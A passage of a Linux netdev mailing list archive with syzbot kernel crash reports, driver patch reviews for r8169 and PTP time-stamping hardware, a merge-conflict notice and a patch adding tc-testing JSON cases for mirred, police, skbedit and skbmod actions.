mm/kasan/kasan.c:241 [inline] RSP: 8801b8c472e0 RIP: check_memory_region_inline mm/kasan/kasan.c:257 [inline] RSP: 8801b8c472e0 RIP: check_memory_region+0x83/0x190 mm/kasan/kasan.c:267 RSP: 8801b8c472e0 CR2: fc00 ---[ end trace 327b8c6e0903b0d7 ]--- --- This bug is generated by a dumb bot. It may contain errors. See https://goo.gl/tpsmEJ for details. Direct all questions to syzkal...@goo
general protection fault in tipc_sk_fill_sock_diag
Hello, syzbot hit the following crash on net-next commit 94cb5492409219ee3f9468616dd58af314029f76 (Fri Mar 23 18:31:30 2018 +) net/sched: act_vlan: declare push_vid with host byte order syzbot dashboard link: https://syzkaller.appspot.com/bug?extid=326e587eff1074657718 So far this crash happened 8 times on net-next. C reproducer: https://syzkaller.appspot.com/x/repro.c?id=5316828523921408 syzkaller reproducer: https://syzkaller.appspot.com/x/repro.syz?id=5398288350052352 Raw console output: https://syzkaller.appspot.com/x/log.txt?id=5097949340106752 Kernel config: https://syzkaller.appspot.com/x/.config?id=2445237949826843652 compiler: gcc (GCC) 7.1.1 20170620 IMPORTANT: if you fix the bug, please add the following tag to the commit: Reported-by: syzbot+326e587eff1074657...@syzkaller.appspotmail.com It will help syzbot understand when the bug is fixed. See footer for details. If you forward the report, please keep this part and the footer. audit: type=1400 audit(1522009585.022:6): avc: denied { map } for pid=4261 comm="bash" path="/bin/bash" dev="sda1" ino=1457 scontext=unconfined_u:system_r:insmod_t:s0-s0:c0.c1023 tcontext=system_u:object_r:file_t:s0 tclass=file permissive=1 audit: type=1400 audit(1522009597.461:7): avc: denied { map } for pid=4277 comm="syzkaller549428" path="/root/syzkaller549428900" dev="sda1" ino=16481 scontext=unconfined_u:system_r:insmod_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_home_t:s0 tclass=file permissive=1 kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory access general protection fault: [#1] SMP KASAN Dumping ftrace buffer: (ftrace buffer empty) Modules linked in: CPU: 0 PID: 4277 Comm: syzkaller549428 Not tainted 4.16.0-rc6+ #280 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 RIP: 0010:sk_user_ns include/net/sock.h:748 [inline] RIP: 0010:tipc_sk_fill_sock_diag+0x42d/0xc00 net/tipc/socket.c:3282 RSP: 0018:8801b017eff0 EFLAGS: 00010206 RAX: RBX: 11003602fe04 RCX: 002b RDX: dc00 RSI: 110035d4b577 RDI: 0158 RBP: 8801b017f2a8 R08: 11003602fdbf R09: R10: R11: R12: 8801d1637740 R13: 8801b0d50d40 R14: 8801b017f280 R15: FS: 014a6880() GS:8801db20() knlGS: CS: 0010 DS: ES: CR0: 80050033 CR2: 20005000 CR3: 0001b01b3005 CR4: 001606f0 DR0: DR1: DR2: DR3: DR6: fffe0ff0 DR7: 0400 Call Trace: __tipc_add_sock_diag+0x20e/0x330 net/tipc/diag.c:62 tipc_nl_sk_walk+0x565/0xb60 net/tipc/socket.c:3240 tipc_diag_dump+0x24/0x30 net/tipc/diag.c:73 netlink_dump+0x492/0xcf0 net/netlink/af_netlink.c: __netlink_dump_start+0x4ec/0x710 net/netlink/af_netlink.c:2319 netlink_dump_start include/linux/netlink.h:214 [inline] tipc_sock_diag_handler_dump+0x206/0x2c0 net/tipc/diag.c:89 __sock_diag_cmd net/core/sock_diag.c:230 [inline] sock_diag_rcv_msg+0x204/0x360 net/core/sock_diag.c:261 netlink_rcv_skb+0x14b/0x380 net/netlink/af_netlink.c:2444 sock_diag_rcv+0x2a/0x40 net/core/sock_diag.c:272 netlink_unicast_kernel net/netlink/af_netlink.c:1308 [inline] netlink_unicast+0x4c4/0x6b0 net/netlink/af_netlink.c:1334 netlink_sendmsg+0xa4a/0xe60 net/netlink/af_netlink.c:1897 sock_sendmsg_nosec net/socket.c:629 [inline] sock_sendmsg+0xca/0x110 net/socket.c:639 ___sys_sendmsg+0x767/0x8b0 net/socket.c:2047 __sys_sendmsg+0xe5/0x210 net/socket.c:2081 SYSC_sendmsg net/socket.c:2092 [inline] SyS_sendmsg+0x2d/0x50 net/socket.c:2088 do_syscall_64+0x281/0x940 arch/x86/entry/common.c:287 entry_SYSCALL_64_after_hwframe+0x42/0xb7 RIP: 0033:0x43fde9 RSP: 002b:7ffc6f197198 EFLAGS: 0213 ORIG_RAX: 002e RAX: ffda RBX: 004002c8 RCX: 0043fde9 RDX: RSI: 20005000 RDI: 0003 RBP: 006ca018 R08: 004002c8 R09: 004002c8 R10: 004002c8 R11: 0213 R12: 00401710 R13: 004017a0 R14: R15: Code: f9 48 c1 e9 03 80 3c 11 00 0f 85 b5 07 00 00 4d 8b 7f 18 48 ba 00 00 00 00 00 fc ff df 49 8d bf 58 01 00 00 48 89 f9 48 c1 e9 03 <80> 3c 11 00 0f 85 2b 07 00 00 4d 8b bf 58 01 00 00 48 ba 00 00 RIP: sk_user_ns include/net/sock.h:748 [inline] RSP: 8801b017eff0 RIP: tipc_sk_fill_sock_diag+0x42d/0xc00 net/tipc/socket.c:3282 RSP: 8801b017eff0 ---[ end trace ae417c2a60a8b333 ]--- --- This bug is generated by a dumb bot. It may contain errors. See https://goo.gl/tpsmEJ for details. Direct all questions to syzkal...@googlegroups.com. syzbot will keep track of this bug report. If you forgot to add the Reported-by tag, once the fix for this bug is merged into any tree, please reply to this
possible deadlock in handle_rx
Hello, syzbot hit the following crash on upstream commit cb6416592bc2a8b731dabcec0d63cda270764fc6 (Sun Mar 25 17:45:10 2018 +) Merge tag 'dmaengine-fix-4.16-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/vkoul/slave-dma syzbot dashboard link: https://syzkaller.appspot.com/bug?extid=7f073540b1384a614e09 So far this crash happened 4 times on upstream. C reproducer: https://syzkaller.appspot.com/x/repro.c?id=6506789075943424 syzkaller reproducer: https://syzkaller.appspot.com/x/repro.syz?id=5716250550337536 Raw console output: https://syzkaller.appspot.com/x/log.txt?id=5142038655795200 Kernel config: https://syzkaller.appspot.com/x/.config?id=-5034017172441945317 compiler: gcc (GCC) 7.1.1 20170620 IMPORTANT: if you fix the bug, please add the following tag to the commit: Reported-by: syzbot+7f073540b1384a614...@syzkaller.appspotmail.com It will help syzbot understand when the bug is fixed. See footer for details. If you forward the report, please keep this part and the footer. WARNING: possible recursive locking detected 4.16.0-rc6+ #366 Not tainted vhost-4248/4760 is trying to acquire lock: (&vq->mutex){+.+.}, at: [<3482bddc>] vhost_net_rx_peek_head_len drivers/vhost/net.c:633 [inline] (&vq->mutex){+.+.}, at: [<3482bddc>] handle_rx+0xeb1/0x19c0 drivers/vhost/net.c:784 but task is already holding lock: (&vq->mutex){+.+.}, at: [<4de72f44>] handle_rx+0x1f5/0x19c0 drivers/vhost/net.c:766 other info that might help us debug this: Possible unsafe locking scenario: CPU0 lock(&vq->mutex); lock(&vq->mutex); *** DEADLOCK *** May be due to missing lock nesting notation 1 lock held by vhost-4248/4760: #0: (&vq->mutex){+.+.}, at: [<4de72f44>] handle_rx+0x1f5/0x19c0 drivers/vhost/net.c:766 stack backtrace: CPU: 0 PID: 4760 Comm: vhost-4248 Not tainted 4.16.0-rc6+ #366 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 Call Trace: __dump_stack lib/dump_stack.c:17 [inline] dump_stack+0x194/0x24d lib/dump_stack.c:53 print_deadlock_bug kernel/locking/lockdep.c:1761 [inline] check_deadlock kernel/locking/lockdep.c:1805 [inline] validate_chain kernel/locking/lockdep.c:2401 [inline] __lock_acquire+0xe8f/0x3e00 kernel/locking/lockdep.c:3431 lock_acquire+0x1d5/0x580 kernel/locking/lockdep.c:3920 __mutex_lock_common kernel/locking/mutex.c:756 [inline] __mutex_lock+0x16f/0x1a80 kernel/locking/mutex.c:893 mutex_lock_nested+0x16/0x20 kernel/locking/mutex.c:908 vhost_net_rx_peek_head_len drivers/vhost/net.c:633 [inline] handle_rx+0xeb1/0x19c0 drivers/vhost/net.c:784 handle_rx_net+0x19/0x20 drivers/vhost/net.c:910 vhost_worker+0x268/0x470 drivers/vhost/vhost.c:361 kthread+0x33c/0x400 kernel/kthread.c:238 ret_from_fork+0x3a/0x50 arch/x86/entry/entry_64.S:406 --- This bug is generated by a dumb bot. It may contain errors. See https://goo.gl/tpsmEJ for details. Direct all questions to syzkal...@googlegroups.com. syzbot will keep track of this bug report. If you forgot to add the Reported-by tag, once the fix for this bug is merged into any tree, please reply to this email with: #syz fix: exact-commit-title If you want to test a patch for this bug, please reply with: #syz test: git://repo/address.git branch and provide the patch inline or as an attachment. To mark this as a duplicate of another syzbot report, please reply with: #syz dup: exact-subject-of-another-report If it's a one-off invalid bug report, please reply with: #syz invalid Note: if the crash happens again, it will cause creation of a new bug report. Note: all commands must start from beginning of the line in the email body.
Re: [PATCH net] r8169: fix setting driver_data after register_netdev
On Mon, Mar 26, 2018 at 01:07:00AM +0200, Francois Romieu wrote: > Heiner Kallweit : > > pci_set_drvdata() is called only after registering the net_device, > > therefore we could run into a NPE if one of the functions using > > driver_data is called before it's set. > > > > Fix this by calling pci_set_drvdata() before registering the > > net_device. > > > > This fix is a candidate for stable. As far as I can see the > > bug has been there in kernel version 3.2 already, therefore > > I can't provide a reference which commit is fixed by it. > > It does not sound convincing. > > Please tell which functions are supposed to crash. How about rtl8169_get_wol() and rtl8169_set_wol(). And rtl8169_get_ethtool_stats(). Basically anything which makes use of run time power management could be invoked as soon as parts of register_netdev() have been called. Andrew
Re: [PATCH net] r8169: fix setting driver_data after register_netdev
Heiner Kallweit : > pci_set_drvdata() is called only after registering the net_device, > therefore we could run into a NPE if one of the functions using > driver_data is called before it's set. > > Fix this by calling pci_set_drvdata() before registering the > net_device. > > This fix is a candidate for stable. As far as I can see the > bug has been there in kernel version 3.2 already, therefore > I can't provide a reference which commit is fixed by it. It does not sound convincing. Please tell which functions are supposed to crash. Suspend / resume ones ? Anything else ? -- Ueimor
Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.
> > in the future some devices will be MDIO, or I2C, or SPI. Just call it > > ptpdev. This ptpdev needs to be control bus agnostic. You need a > > ptpdev core API exposing functions like ptpdev_hwtstamp, > > ptpdev_rxtstamp, ptpdev_txtstamp, ptpdev_link_change, which take a > > ptpdev. > > Well, this name is not ideal, since time stamping devices in general > can time stamp any frame, not just PTP frames. Hi Richard I don't really care about the name. I care about the semantics of the API. How about ieee1588_rxtstamp, ieee1588_txtstamp, etc. Andrew
Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.
On 03/25/2018 03:10 PM, Richard Cochran wrote: > On Sun, Mar 25, 2018 at 05:59:37PM +0200, Andrew Lunn wrote: 3) How do you limit the MAC/PHY to what the PTP device can do. >>> >>> Hm, I don't think this is important. >> >> So you are happy that the PTP device will cause the MC/PHY link to >> break down when it is asked to do something it cannot do? > > No, but I do expect the system designer to use common sense. No need > to over engineer this now just to catch hypothetical future problems. > >>> Right, so phylib can operate on phydev->attached_dev->mdiots; >> >> So first off, it is not an MDIO device. > > ... > >> To keep lifecycle issues simple, i would also keep it in phydev, not >> netdev. >> >> mdiots as a name is completely wrong. It is not an MDIO device. > > I am well aware of what terms MDIO and MII represent, but our current > code is hopelessly confused. Case in point: > > static inline struct mii_bus *mdiobus_alloc(void); > > The kernel's 'struct mii_bus' is really only about MDIO and not about > the rest of MII. Clearly MII time stamping devices belong on the MII > bus, so that is where I put them. They do, if and only if their control path goes through the MDIO bus, this one does not, see below. > > Or maybe mii_bus should first be renamed to mdio_bus? That you pave > the way for introducing a representation of the MII bus. It would have been ideal to name this structure mdio_bus, because that is what it indeed is. An argument could be made this is true about a lot of devices though, e.g: PCIe end point drivers do register a pci_driver/device, not a pcie_driver/device... Andrew still has a valid point though that devices are child of their control bus, not data bus. The data bus here is MII, but the control bus is here through MMIO register, therefore platform device in Linux's device driver model so we would expect the The best that I can think about and it still is a hack in some way, is to you have your time stamping driver create a proxy mii_bus whose purpose is just to hook to mdio/phy_device events (such as link changes) in order to do what is necessary, or at least, this would indicate its transparent nature towards the MDIO/MDC lines... What is not great in your current binding is that you created a notion of "port" which is tied to the timestamper device, whereas it really seems to be a property of the Ethernet controller, where the datapath being timestamped resides. Tangential: the existing PHY time stamping logic should probably be generalized to a mdio_device (which the phy_device is a specialized superset of) instead of to the phy_device. This would still allow existing use cases but it would also allow us to support possible "pure MDIO" devices would that become some thing in the future. > >> in the future some devices will be MDIO, or I2C, or SPI. Just call it >> ptpdev. This ptpdev needs to be control bus agnostic. You need a >> ptpdev core API exposing functions like ptpdev_hwtstamp, >> ptpdev_rxtstamp, ptpdev_txtstamp, ptpdev_link_change, which take a >> ptpdev. > > Well, this name is not ideal, since time stamping devices in general > can time stamp any frame, not just PTP frames. > >> You can then clean up the code in timestamping.c. Code like: >> >> phydev = skb->dev->phydev; >> if (likely(phydev->drv->txtstamp)) { >> clone = skb_clone_sk(skb); >> if (!clone) >> return; >> phydev->drv->txtstamp(phydev, clone, type); >> } >> >> violates the layering, and the locking looks broken. > > Are you sure the locking is broken? If so, how? > > (This code path has been reviewed more than once.) > > Can you please explain the layering and how this code breaks it? I see it both ways, you either invoke an operation to timestamp which goes into an abstract "timestamping device" which invokes a driver to determine the actual operation, or you can do what you did which was to augment struct net_device with a phy_device, under the premise this will be the only type of timestamping capable device we will ever see. This is no longer holding true, your patches are a testament to that, so now you need another member: mdiots, as you can see, there is now overlap between the two, because a phy_device should arguably be encapsulating a mdiots device object... > > (This code goes back to 2.6.36 and perhaps predates the layers that > were added later on.) > > Thanks, > Richard > -- Florian
Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.
> > You can then clean up the code in timestamping.c. Code like: > > > > phydev = skb->dev->phydev; > > if (likely(phydev->drv->txtstamp)) { > > clone = skb_clone_sk(skb); > > if (!clone) > > return; > > phydev->drv->txtstamp(phydev, clone, type); > > } > > > > violates the layering, and the locking looks broken. > > Are you sure the locking is broken? If so, how? As a general rule of thumb, locking is performed in the core when possible. Experience has shown that device driver writers get locking wrong more often than core code writers. So doing it once in the core results in less bugs. The phylib core code will take the phydev lock before calling into the driver. By violating the layering, we are missing on this lock. Maybe the one driver which currently implements these calls does not need locking. But after the Marvell DSA work, we have most of the code needed to implement support for the Marvell PHY PTP. It has pretty similar registers. That would need the phydev lock to be held, because we need to swap to different pages, so any other calls happening in parallel are going to see registers from the wrong page. I don't want to have to put these locks in the driver, that leads to bugs. The core should do it. Andrew
[PATCH net] r8169: fix setting driver_data after register_netdev
pci_set_drvdata() is called only after registering the net_device, therefore we could run into a NPE if one of the functions using driver_data is called before it's set. Fix this by calling pci_set_drvdata() before registering the net_device. This fix is a candidate for stable. As far as I can see the bug has been there in kernel version 3.2 already, therefore I can't provide a reference which commit is fixed by it. The fix may need small adjustments per kernel version because due to other changes the label which is jumped to if register_netdev() fails has changed over time. Reported-by: David Miller Signed-off-by: Heiner Kallweit --- drivers/net/ethernet/realtek/r8169.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/realtek/r8169.c b/drivers/net/ethernet/realtek/r8169.c index 630409e0..604ae783 100644 --- a/drivers/net/ethernet/realtek/r8169.c +++ b/drivers/net/ethernet/realtek/r8169.c @@ -8378,12 +8378,12 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent) if (!tp->counters) return -ENOMEM; + pci_set_drvdata(pdev, dev); + rc = register_netdev(dev); if (rc < 0) return rc; - pci_set_drvdata(pdev, dev); - netif_info(tp, probe, dev, "%s at 0x%p, %pM, XID %08x IRQ %d\n", rtl_chip_infos[chipset].name, tp->mmio_addr, dev->dev_addr, (u32)(RTL_R32(tp, TxConfig) & 0x9cf0f8ff), -- 2.16.2
linux-next: manual merge of the ipsec tree with the net tree
Hi Steffen, Today's linux-next merge of the ipsec tree got a conflict in: net/ipv4/ip_tunnel.c between commit: f6cc9c054e77 ("ip_tunnel: Emit events for post-register MTU changes") from the net tree and commit: 24fc79798b8d ("ip_tunnel: Clamp MTU to bounds on new link") from the ipsec tree. I fixed it up (see below) and can carry the fix as necessary. This is now fixed as far as linux-next is concerned, but any non trivial conflicts should be mentioned to your upstream maintainer when your tree is submitted for merging. You may also want to consider cooperating with the maintainer of the conflicting tree to minimise any particularly complex conflicts. -- Cheers, Stephen Rothwell diff --cc net/ipv4/ip_tunnel.c index 7b85ffad5d74,7c76dd17b6b9.. --- a/net/ipv4/ip_tunnel.c +++ b/net/ipv4/ip_tunnel.c @@@ -1117,10 -1108,13 +1117,15 @@@ int ip_tunnel_newlink(struct net_devic eth_hw_addr_random(dev); mtu = ip_tunnel_bind_dev(dev); - if (!tb[IFLA_MTU]) { + if (tb[IFLA_MTU]) { + unsigned int max = 0xfff8 - dev->hard_header_len - nt->hlen; + + dev->mtu = clamp(dev->mtu, (unsigned int)ETH_MIN_MTU, +(unsigned int)(max - sizeof(struct iphdr))); + } else { - dev->mtu = mtu; + err = dev_set_mtu(dev, mtu); + if (err) + goto err_dev_set_mtu; } ip_tunnel_add(itn, nt); pgpChhvgOn4lq.pgp Description: OpenPGP digital signature
Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.
On Sun, Mar 25, 2018 at 05:59:37PM +0200, Andrew Lunn wrote: > To keep lifecycle issues simple, i would also keep it in phydev, not > netdev. Okay. Since we don't have any representation for MII anyhow, it seems equally fitting to attach this to the PHY's data structure as to the MAC's. Thanks, Richard
Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.
On Sun, Mar 25, 2018 at 05:59:37PM +0200, Andrew Lunn wrote: > > > 3) How do you limit the MAC/PHY to what the PTP device can do. > > > > Hm, I don't think this is important. > > So you are happy that the PTP device will cause the MC/PHY link to > break down when it is asked to do something it cannot do? No, but I do expect the system designer to use common sense. No need to over engineer this now just to catch hypothetical future problems. > > Right, so phylib can operate on phydev->attached_dev->mdiots; > > So first off, it is not an MDIO device. ... > To keep lifecycle issues simple, i would also keep it in phydev, not > netdev. > > mdiots as a name is completely wrong. It is not an MDIO device. I am well aware of what terms MDIO and MII represent, but our current code is hopelessly confused. Case in point: static inline struct mii_bus *mdiobus_alloc(void); The kernel's 'struct mii_bus' is really only about MDIO and not about the rest of MII. Clearly MII time stamping devices belong on the MII bus, so that is where I put them. Or maybe mii_bus should first be renamed to mdio_bus? That you pave the way for introducing a representation of the MII bus. > in the future some devices will be MDIO, or I2C, or SPI. Just call it > ptpdev. This ptpdev needs to be control bus agnostic. You need a > ptpdev core API exposing functions like ptpdev_hwtstamp, > ptpdev_rxtstamp, ptpdev_txtstamp, ptpdev_link_change, which take a > ptpdev. Well, this name is not ideal, since time stamping devices in general can time stamp any frame, not just PTP frames. > You can then clean up the code in timestamping.c. Code like: > > phydev = skb->dev->phydev; > if (likely(phydev->drv->txtstamp)) { > clone = skb_clone_sk(skb); > if (!clone) > return; > phydev->drv->txtstamp(phydev, clone, type); > } > > violates the layering, and the locking looks broken. Are you sure the locking is broken? If so, how? (This code path has been reviewed more than once.) Can you please explain the layering and how this code breaks it? (This code goes back to 2.6.36 and perhaps predates the layers that were added later on.) Thanks, Richard
Re: [PATCH v3 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode
Hi Andrew, On Mon, Mar 26, 2018 at 12:02:37AM +0200, Andrew Lunn wrote: > On Sun, Mar 25, 2018 at 11:54:24PM +0200, Uwe Kleine-König wrote: > > On Sun, Mar 25, 2018 at 11:43:14PM +0200, Andrew Lunn wrote: > > > By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING > > > we override the trigger mode provided in device tree. And the > > > interrupt is actually active low, which is what all the current device > > > tree descriptions use. > > > > > > Suggested-by: Uwe Kleine-König > > > Signed-off-by: Andrew Lunn > > Thanks Andrew for the respin. > > Sorry for getting your name wrong so many time. I should know better, > 'little king' makes sense. No problem. Making mistakes is fine if you're ready to correct them :-) Best regards Uwe -- Pengutronix e.K. | Uwe Kleine-König| Industrial Linux Solutions | http://www.pengutronix.de/ |
Re: [PATCH v3 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode
On Sun, Mar 25, 2018 at 11:54:24PM +0200, Uwe Kleine-König wrote: > On Sun, Mar 25, 2018 at 11:43:14PM +0200, Andrew Lunn wrote: > > By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING > > we override the trigger mode provided in device tree. And the > > interrupt is actually active low, which is what all the current device > > tree descriptions use. > > > > Suggested-by: Uwe Kleine-König > > Signed-off-by: Andrew Lunn > Thanks Andrew for the respin. Hi Uwe Sorry for getting your name wrong so many time. I should know better, 'little king' makes sense. Andrew
Re: [PATCH v3 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode
On Sun, Mar 25, 2018 at 11:43:14PM +0200, Andrew Lunn wrote: > By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING > we override the trigger mode provided in device tree. And the > interrupt is actually active low, which is what all the current device > tree descriptions use. > > Suggested-by: Uwe Kleine-König > Signed-off-by: Andrew Lunn Thanks Andrew for the respin. Acked-by: Uwe Kleine-König Tested-by: Uwe Kleine-König Best regards Uwe -- Pengutronix e.K. | Uwe Kleine-König| Industrial Linux Solutions | http://www.pengutronix.de/ |
[PATCH v3 net-next 2/2] net: dsa: mv88e6xxx: Call the common IRQ free code
When free'ing the polled IRQs, call the common irq free code. Otherwise the interrupts are left registered, and when we come to load the driver a second time, we get an Opps. Signed-off-by: Andrew Lunn --- drivers/net/dsa/mv88e6xxx/chip.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c index 3ba77067a3dc..9a5d786b4885 100644 --- a/drivers/net/dsa/mv88e6xxx/chip.c +++ b/drivers/net/dsa/mv88e6xxx/chip.c @@ -467,6 +467,8 @@ static int mv88e6xxx_irq_poll_setup(struct mv88e6xxx_chip *chip) static void mv88e6xxx_irq_poll_free(struct mv88e6xxx_chip *chip) { + mv88e6xxx_g1_irq_free_common(chip); + kthread_cancel_delayed_work_sync(&chip->irq_poll_work); kthread_destroy_worker(chip->kworker); } -- 2.16.2
[PATCH v3 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode
By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING we override the trigger mode provided in device tree. And the interrupt is actually active low, which is what all the current device tree descriptions use. Suggested-by: Uwe Kleine-König Signed-off-by: Andrew Lunn --- v2: Fix the ü in Künig v3: Which should actually be an ö --- drivers/net/dsa/mv88e6xxx/chip.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c index fd78378ad6b1..3ba77067a3dc 100644 --- a/drivers/net/dsa/mv88e6xxx/chip.c +++ b/drivers/net/dsa/mv88e6xxx/chip.c @@ -425,7 +425,7 @@ static int mv88e6xxx_g1_irq_setup(struct mv88e6xxx_chip *chip) err = request_threaded_irq(chip->irq, NULL, mv88e6xxx_g1_irq_thread_fn, - IRQF_ONESHOT | IRQF_TRIGGER_FALLING, + IRQF_ONESHOT, dev_name(chip->dev), chip); if (err) mv88e6xxx_g1_irq_free_common(chip); -- 2.16.2
[PATCH v3 net-next 0/2] Fixes to allow mv88e6xxx module to be reloaded
As reported by Uwe Kleine-König, the interrupt trigger is first configured by DT and then reconfigured to edge. This results in a failure on EPROBE_DEFER, or if the module is unloaded and reloaded. A second crash happens on module reload due to a missing call to the common IRQ free code when using polled interrupts. With these fixes in place, it becomes possible to load and unload the kernel modules a few times without it crashing. v2: Fix the ü in Künig a couple of times v3: But the ü should be an ö! Andrew Lunn (2): net: dsa: mv88e6xxx: Use the DT IRQ trigger mode net: dsa: mv88e6xxx: Call the common IRQ free code drivers/net/dsa/mv88e6xxx/chip.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) -- 2.16.2
Re: [PATCH v2 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode
On Sun, Mar 25, 2018 at 06:09:11PM -0300, Fabio Estevam wrote: > Hi Andrew, > > On Sun, Mar 25, 2018 at 5:56 PM, Andrew Lunn wrote: > > By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING > > we override the trigger mode provided in device tree. And the > > interrupt is actually active low, which is what all the current device > > tree descriptions use. > > > > Suggested-by: Uwe Kleine-Künig > > The correct is König, not Künig. Arg! Well, at least i got my locale working correctly! Andrew
Re: [PATCH net-next 5/6] r8169: change type of driver_data
Am 25.03.2018 um 22:43 schrieb David Miller: > From: Heiner Kallweit > Date: Sat, 24 Mar 2018 23:18:25 +0100 > >> Several functions accessing the device driver_data field don't need the >> net_device. All needed parameters can be accessed via struct >> rtl8169_private, therefore change type of driver_data accordingly. >> >> Signed-off-by: Heiner Kallweit > > This doesn't work. > > The pci_set_drvdata() call happens after register_netdevice(). > > At the exact moment register_netdevice() is called, any part of the > driver can be invoked before it returns. > > Therefore this change will result in crashes because the drvdata won't > be initialized early enough. > Thanks for catching this. The patch however just changes the parameter of pci_set_drvdata, not the position of this call. This means the potential crash scenario we have already w/o the patch and it's a long-standing bug. Having said that I'd submit a fix for this bug first and then a rebased version of the cleanup patch set (if fine with you). > I really think you're taking things too far with the cleanups of this > driver. It is a reasonably old driver used by a lot of people, and I > think avoiding regressions is 1000 times more important than > "streamlining" control plane functions that have not effect whatsoever > on real driver performance. > > Thank you. >
[RESEND PATCH net-next 1/1] tc-testing: updated police, mirred, skbedit and skbmod with more tests
Added extra test cases for control actions (reclassify, pipe etc.), cookies, max index value and police args sanity check. Signed-off-by: Roman Mashak --- .../tc-testing/tc-tests/actions/mirred.json| 192 + .../tc-testing/tc-tests/actions/police.json| 144 .../tc-testing/tc-tests/actions/skbedit.json | 168 ++ .../tc-testing/tc-tests/actions/skbmod.json| 26 ++- 4 files changed, 529 insertions(+), 1 deletion(-) diff --git a/tools/testing/selftests/tc-testing/tc-tests/actions/mirred.json b/tools/testing/selftests/tc-testing/tc-tests/actions/mirred.json index 0fcccf18399b..443c9b3c8664 100644 --- a/tools/testing/selftests/tc-testing/tc-tests/actions/mirred.json +++ b/tools/testing/selftests/tc-testing/tc-tests/actions/mirred.json @@ -171,6 +171,198 @@ ] }, { +"id": "8917", +"name": "Add mirred mirror action with control pass", +"category": [ +"actions", +"mirred" +], +"setup": [ +[ +"$TC actions flush action mirred", +0, +1, +255 +] +], +"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo pass index 1", +"expExitCode": "0", +"verifyCmd": "$TC actions get action mirred index 1", +"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to device lo\\) pass.*index 1 ref", +"matchCount": "1", +"teardown": [ +"$TC actions flush action mirred" +] +}, +{ +"id": "1054", +"name": "Add mirred mirror action with control pipe", +"category": [ +"actions", +"mirred" +], +"setup": [ +[ +"$TC actions flush action mirred", +0, +1, +255 +] +], +"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo pipe index 15", +"expExitCode": "0", +"verifyCmd": "$TC actions get action mirred index 15", +"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to device lo\\) pipe.*index 15 ref", +"matchCount": "1", +"teardown": [ +"$TC actions flush action mirred" +] +}, +{ +"id": "9887", +"name": "Add mirred mirror action with control continue", +"category": [ +"actions", +"mirred" +], +"setup": [ +[ +"$TC actions flush action mirred", +0, +1, +255 +] +], +"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo continue index 15", +"expExitCode": "0", +"verifyCmd": "$TC actions get action mirred index 15", +"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to device lo\\) continue.*index 15 ref", +"matchCount": "1", +"teardown": [ +"$TC actions flush action mirred" +] +}, +{ +"id": "e4aa", +"name": "Add mirred mirror action with control reclassify", +"category": [ +"actions", +"mirred" +], +"setup": [ +[ +"$TC actions flush action mirred", +0, +1, +255 +] +], +"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo reclassify index 150", +"expExitCode": "0", +"verifyCmd": "$TC actions get action mirred index 150", +"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to device lo\\) reclassify.*index 150 ref", +"matchCount": "1", +"teardown": [ +"$TC actions flush action mirred" +] +}, +{ +"id": "ece9", +"name": "Add mirred mirror action with control drop", +"category": [ +"actions", +"mirred" +], +"setup": [ +[ +"$TC actions flush action mirred", +0, +1, +255 +] +], +"cmdUnderTest": "$TC actions add action mirred ingress mirror dev lo drop index 99", +"expExitCode": "0", +"verifyCmd": "$TC actions get action mirred index 99", +"matchPattern": "action order [0-9]*: mirred \\(Ingress Mirror to device lo\\) drop.*index 99 ref", +"matchCount": "1", +"teardown": [ +"$TC actions flush action mirred" +] +}, +{ +"id": "0031", +"name": "Add mirred mirror action with control jump", +"category": [ +"actions", +"mirred" +], +"setup": [ +[ +"$TC actions flush action mirred", +0,
Re: [PATCH v2 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode
Hi Andrew, On Sun, Mar 25, 2018 at 5:56 PM, Andrew Lunn wrote: > By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING > we override the trigger mode provided in device tree. And the > interrupt is actually active low, which is what all the current device > tree descriptions use. > > Suggested-by: Uwe Kleine-Künig The correct is König, not Künig.
Re: [PATCH net-next,0/2] hv_netvsc: Fix/improve RX path error handling
From: Haiyang Zhang Date: Thu, 22 Mar 2018 12:01:12 -0700 > Fix the status code returned to the host. Also add range > check for rx packet offset and length. Series applied, thank you.
Re: [PATCH net-next 1/1] tc-testing: Correct compound statements for namespace execution
